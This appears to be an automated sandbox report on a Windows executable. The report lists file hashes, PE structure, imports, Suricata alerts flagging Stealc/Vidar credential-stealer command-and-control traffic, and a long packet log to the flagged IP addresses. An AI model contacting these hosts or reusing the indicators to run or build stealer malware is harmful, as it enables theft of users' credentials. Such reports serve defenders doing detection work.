Chrome Cache Entry: 82

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	29
Entropy (8bit):	3.9353986674667634
Encrypted:	false
SSDEEP:	3:VQAOx/1n:VQAOd1n
MD5:	6FED308183D5DFC421602548615204AF
SHA1:	0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
SHA-256:	4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
SHA-512:	A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
Malicious:	false
URL:	https://www.google.com/async/newtab_promos
Preview:	)]}'.{"update":{"promos":{}}}

Chrome Cache Entry: 83

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65531)
Category:	downloaded
Size (bytes):	134253
Entropy (8bit):	5.442205903773347
Encrypted:	false
SSDEEP:	3072:fykX33ov7GsG688fJbk/5xnsmLWjwR2i6o:f13lr6t2/5xnsmawR8o
MD5:	C5DBDF67010C50A955A78E3E3049A7A1
SHA1:	04A7F0F12F231A3224AAFF83BAFFADEB8AD24B47
SHA-256:	3ABEA73347A6BAF337A4AA6E22060A874C6CA8D44A8DB6EFA1A829623C5854A3
SHA-512:	C88D82EDBD96B0FCF4DEF4495B86F39CE301D54720A11C6166B9881E058FC79411094C58D69F91D7E8FD5D8E672E33D5DD32E91586554FDD06A00A4EF99E161D
Malicious:	false
URL:	https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
Preview:	)]}'.{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e\u003cdiv class\u003d\"gb_Pd\"\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_kd gb_od gb_Fd gb_ld\"\u003e\u003cdiv class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_Jc gb_Mc gb_Q\" aria-label\u003d\"Go back\" title\u003d\"Go back\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.

Static File Info

General

File type:	PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):	6.24962331993131
TrID:	Win64 Executable GUI (202006/5) 92.65% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	xoJxSAotVM.exe
File size:	2'010'112 bytes
MD5:	135436f1ae4e69f5098f8e74e3106863
SHA1:	789cb8efbd9dc5ca1d31acdf22976f46ebbd057b
SHA256:	4535fab33b0df6f1864368f8736efb83d7d6a7db0a09b11e3d40c8b65b7d5428
SHA512:	732ed25110f23aebcd688527aa25832c0614d8aae57c2f44a9b40150dd5d1cff5694609c0e9c6d39b81edbfe75c1079297f0d594833bd524465c86930b74cd08
SSDEEP:	24576:IDSWIUAwZAbdKF2V3KcGmeKY5oswA27wqcNh1ixZomTdTJmEsVjcMFdL2Zy9:IDSWI1wZadKkV3vcoTwqyh9mTdIXZ2Z
TLSH:	8E9529657A5A98ADC49AC470C3468AA6592130CF0F35BDFF41C486393FAABF11F3D258
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........@.kV@.kV@.kV..hWH.kV..nW..kV..oWK.kVQ hWI.kVQ oWP.kVQ nWi.kV@.jV..kV@.kVX.kV. .VA.kV. iWA.kVRich@.kV........PE..d.....Og...

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x140140ed0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x674FE28A [Wed Dec 4 05:03:06 2024 UTC]
TLS Callbacks:	0x400f8d40, 0x1
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	36e68565e96b8e7da10078441747ec09

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
call 00007FB16C7DFB78h
dec eax
add esp, 28h
jmp 00007FB16C7DF707h
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
nop word ptr [eax+eax+00000000h]
dec eax
sub esp, 10h
dec esp
mov dword ptr [esp], edx
dec esp
mov dword ptr [esp+08h], ebx
dec ebp
xor ebx, ebx
dec esp
lea edx, dword ptr [esp+18h]
dec esp
sub edx, eax
dec ebp
cmovb edx, ebx
dec esp
mov ebx, dword ptr [00000010h]
dec ebp
cmp edx, ebx
jnc 00007FB16C7DF8A8h
inc cx
and edx, 8D4DF000h
wait
add al, dh

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1d762c	0xc8	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x1ec000	0x208	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x1db000	0x10bcc	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x1ed000	0x1cc8	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x19c140	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x19c300	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x19c000	0x140	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x15b000	0x5a0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x1590c0	0x159200	032793bf5d07d87d010a6afdf1da1eee	False	0.4424680539206809	data	6.289512967006869	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x15b000	0x7da80	0x7dc00	e9aed1e5c8d04ae625b300705666c2b9	False	0.30481757890159045	data	5.3018905718619935	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x1d9000	0x1e78	0xc00	0ad7e54d4eb5e6daba5fbc0af297387a	False	0.14908854166666666	data	2.0733532601209266	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0x1db000	0x10bcc	0x10c00	09d326083f90fe80c91c8117fdeb75a1	False	0.501151469216418	data	6.219822794015021	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x1ec000	0x208	0x400	2460b9c365ab44503c0393c047d93958	False	0.271484375	data	3.0780987306118006	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x1ed000	0x1cc8	0x1e00	e3b624937fe039af557fcb1ac78b3b57	False	0.459765625	data	5.382769304463102	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x1ec060	0x1a5	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5415676959619953

Imports

DLL	Import
api-ms-win-core-synch-l1-2-0.dll	WakeByAddressAll, WaitOnAddress, WakeByAddressSingle
bcryptprimitives.dll	ProcessPrng
kernel32.dll	GetConsoleOutputCP, FlushFileBuffers, HeapSize, LCMapStringW, CompareStringW, GetQueuedCompletionStatusEx, FlsFree, FlsSetValue, CreateIoCompletionPort, SetFileCompletionNotificationModes, SetLastError, GetFinalPathNameByHandleW, FlsGetValue, FlsAlloc, SwitchToThread, CloseHandle, GetLastError, SetFilePointerEx, HeapReAlloc, GetCurrentThread, GetStringTypeW, GetFileType, HeapFree, SetThreadStackGuarantee, AddVectoredExceptionHandler, SetStdHandle, SetEnvironmentVariableW, GetCPInfo, Sleep, GetOEMCP, WaitForSingleObject, PostQueuedCompletionStatus, GetModuleHandleW, SetWaitableTimer, IsValidCodePage, SetHandleInformation, GetStdHandle, GetConsoleMode, FindNextFileW, MultiByteToWideChar, WriteConsoleW, GetModuleHandleA, QueryPerformanceFrequency, FormatMessageW, GetCurrentDirectoryW, lstrlenW, GetEnvironmentVariableW, CreateFileW, SetFileInformationByHandle, GetFullPathNameW, GetFileInformationByHandle, GetFileInformationByHandleEx, FindFirstFileW, FindClose, FindFirstFileExW, GetCommandLineW, GetCommandLineA, GetEnvironmentStringsW, FreeEnvironmentStringsW, CompareStringOrdinal, GetModuleFileNameW, GetSystemDirectoryW, GetWindowsDirectoryW, CreateProcessW, GetFileAttributesW, GetCurrentProcess, DuplicateHandle, InitializeProcThreadAttributeList, UpdateProcThreadAttribute, DeleteProcThreadAttributeList, GetCurrentProcessId, CreateNamedPipeW, CreateThread, WriteFileEx, SleepEx, ReadFileEx, QueryPerformanceCounter, HeapAlloc, GetProcessHeap, RtlCaptureContext, RtlLookupFunctionEntry, WaitForSingleObjectEx, LoadLibraryA, CreateMutexA, ReleaseMutex, RtlVirtualUnwind, WideCharToMultiByte, GetModuleHandleExW, TerminateProcess, GetSystemInfo, ExitProcess, GetProcAddress, CreateWaitableTimerExW, GetACP, WriteFile, LoadLibraryExW, FreeLibrary, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, IsProcessorFeaturePresent, RtlUnwindEx, RtlPcToFileHeader, RaiseException, EncodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree
crypt32.dll	CertOpenStore, CertDuplicateStore, CertGetCertificateChain, CertFreeCertificateContext, CertCloseStore, CertAddCertificateContextToStore, CertEnumCertificatesInStore, CertVerifyCertificateChainPolicy, CertFreeCertificateChain, CertDuplicateCertificateChain, CertDuplicateCertificateContext
bcrypt.dll	BCryptGenRandom
advapi32.dll	SystemFunction036, RegOpenKeyExW, RegCloseKey, RegQueryValueExW
ws2_32.dll	getsockopt, WSASend, getaddrinfo, shutdown, freeaddrinfo, WSAStartup, WSACleanup, recv, send, connect, getsockname, WSAGetLastError, getpeername, closesocket, bind, WSAIoctl, setsockopt, ioctlsocket, WSASocketW
ntdll.dll	NtCancelIoFileEx, NtCreateFile, RtlNtStatusToDosError, NtDeviceIoControlFile, NtWriteFile
secur32.dll	QueryContextAttributesW, FreeContextBuffer, DeleteSecurityContext, AcquireCredentialsHandleA, AcceptSecurityContext, EncryptMessage, FreeCredentialsHandle, ApplyControlToken, DecryptMessage, InitializeSecurityContextW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-04T12:16:04.837362+0100	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	2	192.168.2.4	49730	5.101.153.57	80	TCP
2024-12-04T12:17:10.915098+0100	2049087	ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST	1	192.168.2.4	49762	159.69.102.165	443	TCP
2024-12-04T12:17:13.216477+0100	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	159.69.102.165	443	192.168.2.4	49768	TCP
2024-12-04T12:17:15.512266+0100	2051831	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1	1	159.69.102.165	443	192.168.2.4	49774	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 4, 2024 12:16:02.700131893 CET	49675	443	192.168.2.4	173.222.162.32
Dec 4, 2024 12:16:03.306253910 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:03.426224947 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:03.426302910 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:03.427519083 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:03.547322989 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:04.837083101 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:04.837316990 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:04.837327957 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:04.837362051 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:04.837879896 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:04.837899923 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:04.837922096 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:04.838947058 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:04.838958979 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:04.838998079 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:04.839741945 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:04.839775085 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:04.839801073 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:04.840754032 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:04.840801954 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:04.957259893 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:04.957504988 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:04.957562923 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:04.961442947 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:04.961579084 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:04.961651087 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.038893938 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.039093018 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.039160013 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.042984009 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.043188095 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.043235064 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.051456928 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.051683903 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.051763058 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.059808016 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.060000896 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.060050011 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.068201065 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.068381071 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.068454981 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.076554060 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.076750994 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.076792955 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.084960938 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.085166931 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.085238934 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.093285084 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.093497038 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.093554974 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.101808071 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.101983070 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.102047920 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.110097885 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.110258102 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.110302925 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.116842031 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.117002964 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.117072105 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.123511076 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.123795033 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.123851061 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.258605957 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.258742094 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.258822918 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.260751009 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.260994911 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.261045933 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.265477896 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.265728951 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.265784979 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.270229101 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.270503044 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.270586967 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.274959087 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.275265932 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.275331974 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.279706955 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.279941082 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.279992104 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.284476995 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.284755945 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.284845114 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.289211988 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.289449930 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.289493084 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.293940067 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.294169903 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.294224024 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.298609018 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.298861980 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.298935890 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.303374052 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.303664923 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.303718090 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.308085918 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.308367014 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.308424950 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.312848091 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.313055992 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.313126087 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.317641020 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.317876101 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.317938089 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.322277069 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.322535992 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.322585106 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.327007055 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.327267885 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.327330112 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.331739902 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.331995010 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.332051992 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.336491108 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.336743116 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.336786032 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.341233015 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.341528893 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.341578007 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.345942974 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.346214056 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.346265078 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.350698948 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.350985050 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.351048946 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.355551004 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.403258085 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.459827900 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.460007906 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.460078955 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.461718082 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.461908102 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.461956978 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.465563059 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.467243910 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.467295885 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.467391014 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.470958948 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.471024990 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.471146107 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.474582911 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.474630117 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.474771023 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.478219032 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.478270054 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.478410006 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.481854916 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.481916904 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.482052088 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.485385895 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.485435963 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.485573053 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.488950968 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.489001989 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.489120007 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.492491961 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.492557049 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.492697001 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.496005058 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.496057034 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.496186972 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.499730110 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.499784946 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.499988079 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.503108978 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.503181934 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.503339052 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.506654024 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.506731033 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.506891012 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.510186911 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.510241985 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.510375023 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.513712883 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.513786077 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.513912916 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.517280102 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.517323017 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.517469883 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.521162987 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.521212101 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.521413088 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.525108099 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.525167942 CET	49730	80	192.168.2.4	5.101.153.57
Dec 4, 2024 12:16:05.525234938 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.527877092 CET	80	49730	5.101.153.57	192.168.2.4
Dec 4, 2024 12:16:05.527926922 CET	49730	80	192.168.2.4	5.101.153.57
